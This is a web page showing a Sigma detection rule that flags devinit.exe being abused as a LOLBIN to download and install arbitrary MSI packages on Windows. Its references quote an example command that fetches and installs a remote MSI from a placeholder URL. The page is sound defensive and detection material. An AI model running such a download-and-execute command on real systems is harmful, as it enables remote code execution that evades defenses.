Arbitrary MSI Download Via Devinit.EXE

calendar Apr 14, 2023 · attack.execution attack.defense_evasion attack.t1218  ·
Share on: linkedin copy

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

Sigma rule (View on GitHub)

 1title: Arbitrary MSI Download Via Devinit.EXE
 2id: 90d50722-0483-4065-8e35-57efaadd354d
 3status: test
 4description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
 5references:
 6    - https://twitter.com/mrd0x/status/1460815932402679809
 7    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/
 8author: Florian Roth (Nextron Systems)
 9date: 2022/01/11
10modified: 2023/04/06
11tags:
12    - attack.execution
13    - attack.defense_evasion
14    - attack.t1218
15logsource:
16    category: process_creation
17    product: windows
18detection:
19    selection:
20        CommandLine|contains|all:
21            - ' -t msi-install '
22            - ' -i http'
23    condition: selection
24falsepositives:
25    - Unknown
26level: medium

References

  • Something went wrong, but don’t fret — let’s give it another shot.


    Read More

  • Devinit | LOLBAS

    Downloads an MSI file to C:\Windows\Installer and then installs it. devinit.exe run -t msi-install -i https://example.com/out.msi Use caseExecutes code from a (remote) MSI file. Privileges required...


    Read More

Related rules

to-top